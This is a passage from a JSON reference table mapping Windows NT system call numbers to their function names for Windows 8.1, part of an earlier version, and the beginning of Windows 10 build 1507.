\"171\": \"NtCreateProfileEx\", \"172\": \"NtCreateResourceManager\", \"173\": \"NtCreateSemaphore\", \"174\": \"NtCreateSymbolicLinkObject\", \"175\": \"NtCreateThreadEx\", \"176\": \"NtCreateTimer\", \"177\": \"NtCreateToken\", \"178\": \"NtCreateTokenEx\", \"179\": \"NtCreateTransaction\", \"180\": \"NtCreateTransactionManager\", \"181\": \"NtCreateUserProcess\", \"182\": \"NtCreateWaitCompletionPacket\", \"183\": \"NtCreateWaitablePort\", \"184\": \"NtCreateWnfStateName\", \"185\": \"NtCreateWorkerFactory\", \"186\": \"NtDebugActiveProcess\", \"187\": \"NtDebugContinue\", \"188\": \"NtDeleteAtom\", \"189\": \"NtDeleteBootEntry\", \"190\": \"NtDeleteDriverEntry\", \"191\": \"NtDeleteFile\", \"192\": \"NtDeleteKey\", \"193\": \"NtDeleteObjectAuditAlarm\", \"194\": \"NtDeletePrivateNamespace\", \"195\": \"NtDeleteValueKey\", \"196\": \"NtDeleteWnfStateData\", \"197\": \"NtDeleteWnfStateName\", \"198\": \"NtDisableLastKnownGood\", \"199\": \"NtDisplayString\", \"200\": \"NtDrawText\", \"201\": \"NtEnableLastKnownGood\", \"202\": \"NtEnumerateBootEntries\", \"203\": \"NtEnumerateDriverEntries\", \"204\": \"NtEnumerateSystemEnvironmentValuesEx\", \"205\": \"NtEnumerateTransactionObject\", \"206\": \"NtExtendSection\", \"207\": \"NtFilterBootOption\", \"208\": \"NtFilterToken\", \"209\": \"NtFilterTokenEx\", \"210\": \"NtFlushBuffersFileEx\", \"211\": \"NtFlushInstallUILanguage\", \"212\": \"NtFlushInstructionCache\", \"213\": \"NtFlushKey\", \"214\": \"NtFlushProcessWriteBuffers\", \"215\": \"NtFlushVirtualMemory\", \"216\": \"NtFlushWriteBuffer\", \"217\": \"NtFreeUserPhysicalPages\", \"218\": \"NtFreezeRegistry\", \"219\": \"NtFreezeTransactions\", \"220\": \"NtGetCachedSigningLevel\", \"221\": \"NtGetContextThread\", \"222\": \"NtGetCurrentProcessorNumber\", \"223\": \"NtGetDevicePowerState\", \"224\": \"NtGetMUIRegistryInfo\", \"225\": \"NtGetNextProcess\", \"226\": \"NtGetNextThread\", \"227\": \"NtGetNlsSectionPtr\", \"228\": \"NtGetNotificationResourceManager\", \"229\": \"NtGetWriteWatch\", \"230\": \"NtImpersonateAnonymousToken\", \"231\": \"NtImpersonateThread\", \"232\": \"NtInitializeNlsFiles\", \"233\": \"NtInitializeRegistry\", \"234\": \"NtInitiatePowerAction\", \"235\": \"NtIsSystemResumeAutomatic\", \"236\": \"NtIsUILanguageComitted\", \"237\": \"NtListenPort\", \"238\": \"NtLoadDriver\", \"239\": \"NtLoadKey\", \"240\": \"NtLoadKey2\", \"241\": \"NtLoadKeyEx\", \"242\": \"NtLockFile\", \"243\": \"NtLockProductActivationKeys\", \"244\": \"NtLockRegistryKey\", \"245\": \"NtLockVirtualMemory\", \"246\": \"NtMakePermanentObject\", \"247\": \"NtMakeTemporaryObject\", \"248\": \"NtMapCMFModule\", \"249\": \"NtMapUserPhysicalPages\", \"250\": \"NtModifyBootEntry\", \"251\": \"NtModifyDriverEntry\", \"252\": \"NtNotifyChangeDirectoryFile\", \"253\": \"NtNotifyChangeKey\", \"254\": \"NtNotifyChangeMultipleKeys\", \"255\": \"NtNotifyChangeSession\", \"256\": \"NtOpenEnlistment\", \"257\": \"NtOpenEventPair\", \"258\": \"NtOpenIoCompletion\", \"259\": \"NtOpenJobObject\", \"260\": \"NtOpenKeyEx\", \"261\": \"NtOpenKeyTransacted\", \"262\": \"NtOpenKeyTransactedEx\", \"263\": \"NtOpenKeyedEvent\", \"264\": \"NtOpenMutant\", \"265\": \"NtOpenObjectAuditAlarm\", \"266\": \"NtOpenPrivateNamespace\", \"267\": \"NtOpenProcessToken\", \"268\": \"NtOpenResourceManager\", \"269\": \"NtOpenSemaphore\", \"270\": \"NtOpenSession\", \"271\": \"NtOpenSymbolicLinkObject\", \"272\": \"NtOpenThread\", \"273\": \"NtOpenTimer\", \"274\": \"NtOpenTransaction\", \"275\": \"NtOpenTransactionManager\", \"276\": \"NtPlugPlayControl\", \"277\": \"NtPrePrepareComplete\", \"278\": \"NtPrePrepareEnlistment\", \"279\": \"NtPrepareComplete\", \"280\": \"NtPrepareEnlistment\", \"281\": \"NtPrivilegeCheck\", \"282\": \"NtPrivilegeObjectAuditAlarm\", \"283\": \"NtPrivilegedServiceAuditAlarm\", \"284\": \"NtPropagationComplete\", \"285\": \"NtPropagationFailed\", \"286\": \"NtPulseEvent\", \"287\": \"NtQueryBootEntryOrder\", \"288\": \"NtQueryBootOptions\", \"289\": \"NtQueryDebugFilterState\", \"290\": \"NtQueryDirectoryObject\", \"291\": \"NtQueryDriverEntryOrder\", \"292\": \"NtQueryEaFile\", \"293\": \"NtQueryFullAttributesFile\", \"294\": \"NtQueryInformationAtom\", \"295\": \"NtQueryInformationEnlistment\", \"296\": \"NtQueryInformationJobObject\", \"297\": \"NtQueryInformationPort\", \"298\": \"NtQueryInformationResourceManager\", \"299\": \"NtQueryInformationTransaction\", \"300\": \"NtQueryInformationTransactionManager\", \"301\": \"NtQueryInformationWorkerFactory\", \"302\": \"NtQueryInstallUILanguage\", \"303\": \"NtQueryIntervalProfile\", \"304\": \"NtQueryIoCompletion\", \"305\": \"NtQueryLicenseValue\", \"306\": \"NtQueryMultipleValueKey\", \"307\": \"NtQueryMutant\", \"308\": \"NtQueryOpenSubKeys\", \"309\": \"NtQueryOpenSubKeysEx\", \"310\": \"NtQueryPortInformationProcess\", \"311\": \"NtQueryQuotaInformationFile\", \"312\": \"NtQuerySecurityAttributesToken\", \"313\": \"NtQuerySecurityObject\", \"314\": \"NtQuerySemaphore\", \"315\": \"NtQuerySymbolicLinkObject\", \"316\": \"NtQuerySystemEnvironmentValue\", \"317\": \"NtQuerySystemEnvironmentValueEx\", \"318\": \"NtQuerySystemInformationEx\", \"319\": \"NtQueryTimerResolution\", \"320\": \"NtQueryWnfStateData\", \"321\": \"NtQueryWnfStateNameInformation\", \"322\": \"NtQueueApcThreadEx\", \"323\": \"NtRaiseException\", \"324\": \"NtRaiseHardError\", \"325\": \"NtReadOnlyEnlistment\", \"326\": \"NtRecoverEnlistment\", \"327\": \"NtRecoverResourceManager\", \"328\": \"NtRecoverTransactionManager\", \"329\": \"NtRegisterProtocolAddressInformation\", \"330\": \"NtRegisterThreadTerminatePort\", \"331\": \"NtReleaseKeyedEvent\", \"332\": \"NtReleaseWorkerFactoryWorker\", \"333\": \"NtRemoveIoCompletionEx\", \"334\": \"NtRemoveProcessDebug\", \"335\": \"NtRenameKey\", \"336\": \"NtRenameTransactionManager\", \"337\": \"NtReplaceKey\", \"338\": \"NtReplacePartitionUnit\", \"339\": \"NtReplyWaitReplyPort\", \"340\": \"NtRequestPort\", \"341\": \"NtResetEvent\", \"342\": \"NtResetWriteWatch\", \"343\": \"NtRestoreKey\", \"344\": \"NtResumeProcess\", \"345\": \"NtRollbackComplete\", \"346\": \"NtRollbackEnlistment\", \"347\": \"NtRollbackTransaction\", \"348\": \"NtRollforwardTransactionManager\", \"349\": \"NtSaveKey\", \"350\": \"NtSaveKeyEx\", \"351\": \"NtSaveMergedKeys\", \"352\": \"NtSecureConnectPort\", \"353\": \"NtSerializeBoot\", \"354\": \"NtSetBootEntryOrder\", \"355\": \"NtSetBootOptions\", \"356\": \"NtSetCachedSigningLevel\", \"357\": \"NtSetContextThread\", \"358\": \"NtSetDebugFilterState\", \"359\": \"NtSetDefaultHardErrorPort\", \"360\": \"NtSetDefaultLocale\", \"361\": \"NtSetDefaultUILanguage\", \"362\": \"NtSetDriverEntryOrder\", \"363\": \"NtSetEaFile\", \"364\": \"NtSetHighEventPair\", \"365\": \"NtSetHighWaitLowEventPair\", \"366\": \"NtSetIRTimer\", \"367\": \"NtSetInformationDebugObject\", \"368\": \"NtSetInformationEnlistment\", \"369\": \"NtSetInformationJobObject\", \"370\": \"NtSetInformationKey\", \"371\": \"NtSetInformationResourceManager\", \"372\": \"NtSetInformationToken\", \"373\": \"NtSetInformationTransaction\", \"374\": \"NtSetInformationTransactionManager\", \"375\": \"NtSetInformationVirtualMemory\", \"376\": \"NtSetInformationWorkerFactory\", \"377\": \"NtSetIntervalProfile\", \"378\": \"NtSetIoCompletion\", \"379\": \"NtSetIoCompletionEx\", \"380\": \"NtSetLdtEntries\", \"381\": \"NtSetLowEventPair\", \"382\": \"NtSetLowWaitHighEventPair\", \"383\": \"NtSetQuotaInformationFile\", \"384\": \"NtSetSecurityObject\", \"385\": \"NtSetSystemEnvironmentValue\", \"386\": \"NtSetSystemEnvironmentValueEx\", \"387\": \"NtSetSystemInformation\", \"388\": \"NtSetSystemPowerState\", \"389\": \"NtSetSystemTime\", \"390\": \"NtSetThreadExecutionState\", \"391\": \"NtSetTimerEx\", \"392\": \"NtSetTimerResolution\", \"393\": \"NtSetUuidSeed\", \"394\": \"NtSetVolumeInformationFile\", \"395\": \"NtShutdownSystem\", \"396\": \"NtShutdownWorkerFactory\", \"397\": \"NtSignalAndWaitForSingleObject\", \"398\": \"NtSinglePhaseReject\", \"399\": \"NtStartProfile\", \"400\": \"NtStopProfile\", \"401\": \"NtSubscribeWnfStateChange\", \"402\": \"NtSuspendProcess\", \"403\": \"NtSuspendThread\", \"404\": \"NtSystemDebugControl\", \"405\": \"NtTerminateJobObject\", \"406\": \"NtTestAlert\", \"407\": \"NtThawRegistry\", \"408\": \"NtThawTransactions\", \"409\": \"NtTraceControl\", \"410\": \"NtTranslateFilePath\", \"411\": \"NtUmsThreadYield\", \"412\": \"NtUnloadDriver\", \"413\": \"NtUnloadKey\", \"414\": \"NtUnloadKey2\", \"415\": \"NtUnloadKeyEx\", \"416\": \"NtUnlockFile\", \"417\": \"NtUnlockVirtualMemory\", \"418\": \"NtUnmapViewOfSectionEx\", \"419\": \"NtUnsubscribeWnfStateChange\", \"420\": \"NtUpdateWnfStateData\", \"421\": \"NtVdmControl\", \"422\": \"NtWaitForAlertByThreadId\", \"423\": \"NtWaitForDebugEvent\", \"424\": \"NtWaitForKeyedEvent\", \"425\": \"NtWaitForWnfNotifications\", \"426\": \"NtWaitForWorkViaWorkerFactory\", \"427\": \"NtWaitHighEventPair\", \"428\": \"NtWaitLowEventPair\"}, \"8.1\": {\"0\": \"NtWorkerFactoryWorkerReady\", \"1\": \"NtAcceptConnectPort\", \"2\": \"NtMapUserPhysicalPagesScatter\", \"3\": \"NtWaitForSingleObject\", \"4\": \"NtCallbackReturn\", \"5\": \"NtReadFile\", \"6\": \"NtDeviceIoControlFile\", \"7\": \"NtWriteFile\", \"8\": \"NtRemoveIoCompletion\", \"9\": \"NtReleaseSemaphore\", \"10\": \"NtReplyWaitReceivePort\", \"11\": \"NtReplyPort\", \"12\": \"NtSetInformationThread\", \"13\": \"NtSetEvent\", \"14\": \"NtClose\", \"15\": \"NtQueryObject\", \"16\": \"NtQueryInformationFile\", \"17\": \"NtOpenKey\", \"18\": \"NtEnumerateValueKey\", \"19\": \"NtFindAtom\", \"20\": \"NtQueryDefaultLocale\", \"21\": \"NtQueryKey\", \"22\": \"NtQueryValueKey\", \"23\": \"NtAllocateVirtualMemory\", \"24\": \"NtQueryInformationProcess\", \"25\": \"NtWaitForMultipleObjects32\", \"26\": \"NtWriteFileGather\", \"27\": \"NtSetInformationProcess\", \"28\": \"NtCreateKey\", \"29\": \"NtFreeVirtualMemory\", \"30\": \"NtImpersonateClientOfPort\", \"31\": \"NtReleaseMutant\", \"32\": \"NtQueryInformationToken\", \"33\": \"NtRequestWaitReplyPort\", \"34\": \"NtQueryVirtualMemory\", \"35\": \"NtOpenThreadToken\", \"36\": \"NtQueryInformationThread\", \"37\": \"NtOpenProcess\", \"38\": \"NtSetInformationFile\", \"39\": \"NtMapViewOfSection\", \"40\": \"NtAccessCheckAndAuditAlarm\", \"41\": \"NtUnmapViewOfSection\", \"42\": \"NtReplyWaitReceivePortEx\", \"43\": \"NtTerminateProcess\", \"44\": \"NtSetEventBoostPriority\", \"45\": \"NtReadFileScatter\", \"46\": \"NtOpenThreadTokenEx\", \"47\": \"NtOpenProcessTokenEx\", \"48\": \"NtQueryPerformanceCounter\", \"49\": \"NtEnumerateKey\", \"50\": \"NtOpenFile\", \"51\": \"NtDelayExecution\", \"52\": \"NtQueryDirectoryFile\", \"53\": \"NtQuerySystemInformation\", \"54\": \"NtOpenSection\", \"55\": \"NtQueryTimer\", \"56\": \"NtFsControlFile\", \"57\": \"NtWriteVirtualMemory\", \"58\": \"NtCloseObjectAuditAlarm\", \"59\": \"NtDuplicateObject\", \"60\": \"NtQueryAttributesFile\", \"61\": \"NtClearEvent\", \"62\": \"NtReadVirtualMemory\", \"63\": \"NtOpenEvent\", \"64\": \"NtAdjustPrivilegesToken\", \"65\": \"NtDuplicateToken\", \"66\": \"NtContinue\", \"67\": \"NtQueryDefaultUILanguage\", \"68\": \"NtQueueApcThread\", \"69\": \"NtYieldExecution\", \"70\": \"NtAddAtom\", \"71\": \"NtCreateEvent\", \"72\": \"NtQueryVolumeInformationFile\", \"73\": \"NtCreateSection\", \"74\": \"NtFlushBuffersFile\", \"75\": \"NtApphelpCacheControl\", \"76\": \"NtCreateProcessEx\", \"77\": \"NtCreateThread\", \"78\": \"NtIsProcessInJob\", \"79\": \"NtProtectVirtualMemory\", \"80\": \"NtQuerySection\", \"81\": \"NtResumeThread\", \"82\": \"NtTerminateThread\", \"83\": \"NtReadRequestData\", \"84\": \"NtCreateFile\", \"85\": \"NtQueryEvent\", \"86\": \"NtWriteRequestData\", \"87\": \"NtOpenDirectoryObject\", \"88\": \"NtAccessCheckByTypeAndAuditAlarm\", \"89\": \"NtQuerySystemTime\", \"90\": \"NtWaitForMultipleObjects\", \"91\": \"NtSetInformationObject\", \"92\": \"NtCancelIoFile\", \"93\": \"NtTraceEvent\", \"94\": \"NtPowerInformation\", \"95\": \"NtSetValueKey\", \"96\": \"NtCancelTimer\", \"97\": \"NtSetTimer\", \"98\": \"NtAccessCheck\", \"99\": \"NtAccessCheckByType\", \"100\": \"NtAccessCheckByTypeResultList\", \"101\": \"NtAccessCheckByTypeResultListAndAuditAlarm\", \"102\": \"NtAccessCheckByTypeResultListAndAuditAlarmByHandle\", \"103\": \"NtAddAtomEx\", \"104\": \"NtAddBootEntry\", \"105\": \"NtAddDriverEntry\", \"106\": \"NtAdjustGroupsToken\", \"107\": \"NtAdjustTokenClaimsAndDeviceGroups\", \"108\": \"NtAlertResumeThread\", \"109\": \"NtAlertThread\", \"110\": \"NtAlertThreadByThreadId\", \"111\": \"NtAllocateLocallyUniqueId\", \"112\": \"NtAllocateReserveObject\", \"113\": \"NtAllocateUserPhysicalPages\", \"114\": \"NtAllocateUuids\", \"115\": \"NtAlpcAcceptConnectPort\", \"116\": \"NtAlpcCancelMessage\", \"117\": \"NtAlpcConnectPort\", \"118\": \"NtAlpcConnectPortEx\", \"119\": \"NtAlpcCreatePort\", \"120\": \"NtAlpcCreatePortSection\", \"121\": \"NtAlpcCreateResourceReserve\", \"122\": \"NtAlpcCreateSectionView\", \"123\": \"NtAlpcCreateSecurityContext\", \"124\": \"NtAlpcDeletePortSection\", \"125\": \"NtAlpcDeleteResourceReserve\", \"126\": \"NtAlpcDeleteSectionView\", \"127\": \"NtAlpcDeleteSecurityContext\", \"128\": \"NtAlpcDisconnectPort\", \"129\": \"NtAlpcImpersonateClientOfPort\", \"130\": \"NtAlpcOpenSenderProcess\", \"131\": \"NtAlpcOpenSenderThread\", \"132\": \"NtAlpcQueryInformation\", \"133\": \"NtAlpcQueryInformationMessage\", \"134\": \"NtAlpcRevokeSecurityContext\", \"135\": \"NtAlpcSendWaitReceivePort\", \"136\": \"NtAlpcSetInformation\", \"137\": \"NtAreMappedFilesTheSame\", \"138\": \"NtAssignProcessToJobObject\", \"139\": \"NtAssociateWaitCompletionPacket\", \"140\": \"NtCancelIoFileEx\", \"141\": \"NtCancelSynchronousIoFile\", \"142\": \"NtCancelTimer2\", \"143\": \"NtCancelWaitCompletionPacket\", \"144\": \"NtCommitComplete\", \"145\": \"NtCommitEnlistment\", \"146\": \"NtCommitTransaction\", \"147\": \"NtCompactKeys\", \"148\": \"NtCompareTokens\", \"149\": \"NtCompleteConnectPort\", \"150\": \"NtCompressKey\", \"151\": \"NtConnectPort\", \"152\": \"NtCreateDebugObject\", \"153\": \"NtCreateDirectoryObject\", \"154\": \"NtCreateDirectoryObjectEx\", \"155\": \"NtCreateEnlistment\", \"156\": \"NtCreateEventPair\", \"157\": \"NtCreateIRTimer\", \"158\": \"NtCreateIoCompletion\", \"159\": \"NtCreateJobObject\", \"160\": \"NtCreateJobSet\", \"161\": \"NtCreateKeyTransacted\", \"162\": \"NtCreateKeyedEvent\", \"163\": \"NtCreateLowBoxToken\", \"164\": \"NtCreateMailslotFile\", \"165\": \"NtCreateMutant\", \"166\": \"NtCreateNamedPipeFile\", \"167\": \"NtCreatePagingFile\", \"168\": \"NtCreatePort\", \"169\": \"NtCreatePrivateNamespace\", \"170\": \"NtCreateProcess\", \"171\": \"NtCreateProfile\", \"172\": \"NtCreateProfileEx\", \"173\": \"NtCreateResourceManager\", \"174\": \"NtCreateSemaphore\", \"175\": \"NtCreateSymbolicLinkObject\", \"176\": \"NtCreateThreadEx\", \"177\": \"NtCreateTimer\", \"178\": \"NtCreateTimer2\", \"179\": \"NtCreateToken\", \"180\": \"NtCreateTokenEx\", \"181\": \"NtCreateTransaction\", \"182\": \"NtCreateTransactionManager\", \"183\": \"NtCreateUserProcess\", \"184\": \"NtCreateWaitCompletionPacket\", \"185\": \"NtCreateWaitablePort\", \"186\": \"NtCreateWnfStateName\", \"187\": \"NtCreateWorkerFactory\", \"188\": \"NtDebugActiveProcess\", \"189\": \"NtDebugContinue\", \"190\": \"NtDeleteAtom\", \"191\": \"NtDeleteBootEntry\", \"192\": \"NtDeleteDriverEntry\", \"193\": \"NtDeleteFile\", \"194\": \"NtDeleteKey\", \"195\": \"NtDeleteObjectAuditAlarm\", \"196\": \"NtDeletePrivateNamespace\", \"197\": \"NtDeleteValueKey\", \"198\": \"NtDeleteWnfStateData\", \"199\": \"NtDeleteWnfStateName\", \"200\": \"NtDisableLastKnownGood\", \"201\": \"NtDisplayString\", \"202\": \"NtDrawText\", \"203\": \"NtEnableLastKnownGood\", \"204\": \"NtEnumerateBootEntries\", \"205\": \"NtEnumerateDriverEntries\", \"206\": \"NtEnumerateSystemEnvironmentValuesEx\", \"207\": \"NtEnumerateTransactionObject\", \"208\": \"NtExtendSection\", \"209\": \"NtFilterBootOption\", \"210\": \"NtFilterToken\", \"211\": \"NtFilterTokenEx\", \"212\": \"NtFlushBuffersFileEx\", \"213\": \"NtFlushInstallUILanguage\", \"214\": \"NtFlushInstructionCache\", \"215\": \"NtFlushKey\", \"216\": \"NtFlushProcessWriteBuffers\", \"217\": \"NtFlushVirtualMemory\", \"218\": \"NtFlushWriteBuffer\", \"219\": \"NtFreeUserPhysicalPages\", \"220\": \"NtFreezeRegistry\", \"221\": \"NtFreezeTransactions\", \"222\": \"NtGetCachedSigningLevel\", \"223\": \"NtGetCompleteWnfStateSubscription\", \"224\": \"NtGetContextThread\", \"225\": \"NtGetCurrentProcessorNumber\", \"226\": \"NtGetDevicePowerState\", \"227\": \"NtGetMUIRegistryInfo\", \"228\": \"NtGetNextProcess\", \"229\": \"NtGetNextThread\", \"230\": \"NtGetNlsSectionPtr\", \"231\": \"NtGetNotificationResourceManager\", \"232\": \"NtGetWriteWatch\", \"233\": \"NtImpersonateAnonymousToken\", \"234\": \"NtImpersonateThread\", \"235\": \"NtInitializeNlsFiles\", \"236\": \"NtInitializeRegistry\", \"237\": \"NtInitiatePowerAction\", \"238\": \"NtIsSystemResumeAutomatic\", \"239\": \"NtIsUILanguageComitted\", \"240\": \"NtListenPort\", \"241\": \"NtLoadDriver\", \"242\": \"NtLoadKey\", \"243\": \"NtLoadKey2\", \"244\": \"NtLoadKeyEx\", \"245\": \"NtLockFile\", \"246\": \"NtLockProductActivationKeys\", \"247\": \"NtLockRegistryKey\", \"248\": \"NtLockVirtualMemory\", \"249\": \"NtMakePermanentObject\", \"250\": \"NtMakeTemporaryObject\", \"251\": \"NtMapCMFModule\", \"252\": \"NtMapUserPhysicalPages\", \"253\": \"NtModifyBootEntry\", \"254\": \"NtModifyDriverEntry\", \"255\": \"NtNotifyChangeDirectoryFile\", \"256\": \"NtNotifyChangeKey\", \"257\": \"NtNotifyChangeMultipleKeys\", \"258\": \"NtNotifyChangeSession\", \"259\": \"NtOpenEnlistment\", \"260\": \"NtOpenEventPair\", \"261\": \"NtOpenIoCompletion\", \"262\": \"NtOpenJobObject\", \"263\": \"NtOpenKeyEx\", \"264\": \"NtOpenKeyTransacted\", \"265\": \"NtOpenKeyTransactedEx\", \"266\": \"NtOpenKeyedEvent\", \"267\": \"NtOpenMutant\", \"268\": \"NtOpenObjectAuditAlarm\", \"269\": \"NtOpenPrivateNamespace\", \"270\": \"NtOpenProcessToken\", \"271\": \"NtOpenResourceManager\", \"272\": \"NtOpenSemaphore\", \"273\": \"NtOpenSession\", \"274\": \"NtOpenSymbolicLinkObject\", \"275\": \"NtOpenThread\", \"276\": \"NtOpenTimer\", \"277\": \"NtOpenTransaction\", \"278\": \"NtOpenTransactionManager\", \"279\": \"NtPlugPlayControl\", \"280\": \"NtPrePrepareComplete\", \"281\": \"NtPrePrepareEnlistment\", \"282\": \"NtPrepareComplete\", \"283\": \"NtPrepareEnlistment\", \"284\": \"NtPrivilegeCheck\", \"285\": \"NtPrivilegeObjectAuditAlarm\", \"286\": \"NtPrivilegedServiceAuditAlarm\", \"287\": \"NtPropagationComplete\", \"288\": \"NtPropagationFailed\", \"289\": \"NtPulseEvent\", \"290\": \"NtQueryBootEntryOrder\", \"291\": \"NtQueryBootOptions\", \"292\": \"NtQueryDebugFilterState\", \"293\": \"NtQueryDirectoryObject\", \"294\": \"NtQueryDriverEntryOrder\", \"295\": \"NtQueryEaFile\", \"296\": \"NtQueryFullAttributesFile\", \"297\": \"NtQueryInformationAtom\", \"298\": \"NtQueryInformationEnlistment\", \"299\": \"NtQueryInformationJobObject\", \"300\": \"NtQueryInformationPort\", \"301\": \"NtQueryInformationResourceManager\", \"302\": \"NtQueryInformationTransaction\", \"303\": \"NtQueryInformationTransactionManager\", \"304\": \"NtQueryInformationWorkerFactory\", \"305\": \"NtQueryInstallUILanguage\", \"306\": \"NtQueryIntervalProfile\", \"307\": \"NtQueryIoCompletion\", \"308\": \"NtQueryLicenseValue\", \"309\": \"NtQueryMultipleValueKey\", \"310\": \"NtQueryMutant\", \"311\": \"NtQueryOpenSubKeys\", \"312\": \"NtQueryOpenSubKeysEx\", \"313\": \"NtQueryPortInformationProcess\", \"314\": \"NtQueryQuotaInformationFile\", \"315\": \"NtQuerySecurityAttributesToken\", \"316\": \"NtQuerySecurityObject\", \"317\": \"NtQuerySemaphore\", \"318\": \"NtQuerySymbolicLinkObject\", \"319\": \"NtQuerySystemEnvironmentValue\", \"320\": \"NtQuerySystemEnvironmentValueEx\", \"321\": \"NtQuerySystemInformationEx\", \"322\": \"NtQueryTimerResolution\", \"323\": \"NtQueryWnfStateData\", \"324\": \"NtQueryWnfStateNameInformation\", \"325\": \"NtQueueApcThreadEx\", \"326\": \"NtRaiseException\", \"327\": \"NtRaiseHardError\", \"328\": \"NtReadOnlyEnlistment\", \"329\": \"NtRecoverEnlistment\", \"330\": \"NtRecoverResourceManager\", \"331\": \"NtRecoverTransactionManager\", \"332\": \"NtRegisterProtocolAddressInformation\", \"333\": \"NtRegisterThreadTerminatePort\", \"334\": \"NtReleaseKeyedEvent\", \"335\": \"NtReleaseWorkerFactoryWorker\", \"336\": \"NtRemoveIoCompletionEx\", \"337\": \"NtRemoveProcessDebug\", \"338\": \"NtRenameKey\", \"339\": \"NtRenameTransactionManager\", \"340\": \"NtReplaceKey\", \"341\": \"NtReplacePartitionUnit\", \"342\": \"NtReplyWaitReplyPort\", \"343\": \"NtRequestPort\", \"344\": \"NtResetEvent\", \"345\": \"NtResetWriteWatch\", \"346\": \"NtRestoreKey\", \"347\": \"NtResumeProcess\", \"348\": \"NtRollbackComplete\", \"349\": \"NtRollbackEnlistment\", \"350\": \"NtRollbackTransaction\", \"351\": \"NtRollforwardTransactionManager\", \"352\": \"NtSaveKey\", \"353\": \"NtSaveKeyEx\", \"354\": \"NtSaveMergedKeys\", \"355\": \"NtSecureConnectPort\", \"356\": \"NtSerializeBoot\", \"357\": \"NtSetBootEntryOrder\", \"358\": \"NtSetBootOptions\", \"359\": \"NtSetCachedSigningLevel\", \"360\": \"NtSetContextThread\", \"361\": \"NtSetDebugFilterState\", \"362\": \"NtSetDefaultHardErrorPort\", \"363\": \"NtSetDefaultLocale\", \"364\": \"NtSetDefaultUILanguage\", \"365\": \"NtSetDriverEntryOrder\", \"366\": \"NtSetEaFile\", \"367\": \"NtSetHighEventPair\", \"368\": \"NtSetHighWaitLowEventPair\", \"369\": \"NtSetIRTimer\", \"370\": \"NtSetInformationDebugObject\", \"371\": \"NtSetInformationEnlistment\", \"372\": \"NtSetInformationJobObject\", \"373\": \"NtSetInformationKey\", \"374\": \"NtSetInformationResourceManager\", \"375\": \"NtSetInformationToken\", \"376\": \"NtSetInformationTransaction\", \"377\": \"NtSetInformationTransactionManager\", \"378\": \"NtSetInformationVirtualMemory\", \"379\": \"NtSetInformationWorkerFactory\", \"380\": \"NtSetIntervalProfile\", \"381\": \"NtSetIoCompletion\", \"382\": \"NtSetIoCompletionEx\", \"383\": \"NtSetLdtEntries\", \"384\": \"NtSetLowEventPair\", \"385\": \"NtSetLowWaitHighEventPair\", \"386\": \"NtSetQuotaInformationFile\", \"387\": \"NtSetSecurityObject\", \"388\": \"NtSetSystemEnvironmentValue\", \"389\": \"NtSetSystemEnvironmentValueEx\", \"390\": \"NtSetSystemInformation\", \"391\": \"NtSetSystemPowerState\", \"392\": \"NtSetSystemTime\", \"393\": \"NtSetThreadExecutionState\", \"394\": \"NtSetTimer2\", \"395\": \"NtSetTimerEx\", \"396\": \"NtSetTimerResolution\", \"397\": \"NtSetUuidSeed\", \"398\": \"NtSetVolumeInformationFile\", \"399\": \"NtSetWnfProcessNotificationEvent\", \"400\": \"NtShutdownSystem\", \"401\": \"NtShutdownWorkerFactory\", \"402\": \"NtSignalAndWaitForSingleObject\", \"403\": \"NtSinglePhaseReject\", \"404\": \"NtStartProfile\", \"405\": \"NtStopProfile\", \"406\": \"NtSubscribeWnfStateChange\", \"407\": \"NtSuspendProcess\", \"408\": \"NtSuspendThread\", \"409\": \"NtSystemDebugControl\", \"410\": \"NtTerminateJobObject\", \"411\": \"NtTestAlert\", \"412\": \"NtThawRegistry\", \"413\": \"NtThawTransactions\", \"414\": \"NtTraceControl\", \"415\": \"NtTranslateFilePath\", \"416\": \"NtUmsThreadYield\", \"417\": \"NtUnloadDriver\", \"418\": \"NtUnloadKey\", \"419\": \"NtUnloadKey2\", \"420\": \"NtUnloadKeyEx\", \"421\": \"NtUnlockFile\", \"422\": \"NtUnlockVirtualMemory\", \"423\": \"NtUnmapViewOfSectionEx\", \"424\": \"NtUnsubscribeWnfStateChange\", \"425\": \"NtUpdateWnfStateData\", \"426\": \"NtVdmControl\", \"427\": \"NtWaitForAlertByThreadId\", \"428\": \"NtWaitForDebugEvent\", \"429\": \"NtWaitForKeyedEvent\", \"430\": \"NtWaitForWorkViaWorkerFactory\", \"431\": \"NtWaitHighEventPair\", \"432\": \"NtWaitLowEventPair\"}}, \"Windows 10\": {\"1507\": {\"0\": \"NtAccessCheck\", \"1\": \"NtWorkerFactoryWorkerReady\", \"2\": \"NtAcceptConnectPort\", \"3\": \"NtMapUserPhysicalPagesScatter\", \"4\": \"NtWaitForSingleObject\", \"5\": \"NtCallbackReturn\", \"6\": \"NtReadFile\", \"7\": \"NtDeviceIoControlFile\", \"8\": \"NtWriteFile\", \"9\": \"NtRemoveIoCompletion\", \"10\": \"NtReleaseSemaphore\", \"11\": \"NtReplyWaitReceivePort\", \"12\": \"NtReplyPort\", \"13\": \"NtSetInformationThread\", \"14\": \"NtSetEvent\", \"15\": \"NtClose\", \"16\": \"NtQueryObject\", \"17\": \"NtQueryInformationFile\", \"18\": \"NtOpenKey\", \"19\": \"NtEnumerateValueKey\", \"20\": \"NtFindAtom\", \"21\": \"NtQueryDefaultLocale\", \"22\": \"NtQueryKey\", \"23\": \"NtQueryValueKey\", \"24\": \"NtAllocateVirtualMemory\", \"25\": \"NtQueryInformationProcess\", \"26\": \"NtWaitForMultipleObjects32\", \"27\": \"NtWriteFileGather\", \"28\": \"NtSetInformationProcess\", \"29\": \"NtCreateKey\", \"30\": \"NtFreeVirtualMemory\", \"31\": \"NtImpersonateClientOfPort\", \"32\": \"NtReleaseMutant\", \"33\": \"NtQueryInformationToken\", \"34\": \"NtRequestWaitReplyPort\", \"35\": \"NtQueryVirtualMemory\", \"36\": \"NtOpenThreadToken\", \"37\": \"NtQueryInformationThread\", \"38\": \"NtOpenProcess\", \"39\": \"NtSetInformationFile\", \"40\": \"NtMapViewOfSection\", \"41\": \"NtAccessCheckAndAuditAlarm\", \"42\": \"NtUnmapViewOfSection\", \"43\": \"NtReplyWaitReceivePortEx\", \"44\": \"NtTerminateProcess\", \"45\": \"NtSetEventBoostPriority\", \"46\": \"NtReadFileScatter\", \"47\": \"NtOpenThreadTokenEx\", \"48\": \"NtOpenProcessTokenEx\", \"49\": \"NtQueryPerformanceCounter\", \"50\": \"NtEnumerateKey\", \"51\": \"NtOpenFile\", \"52\": \"NtDelayExecution\", \"53\": \"NtQueryDirectoryFile\", \"54\": 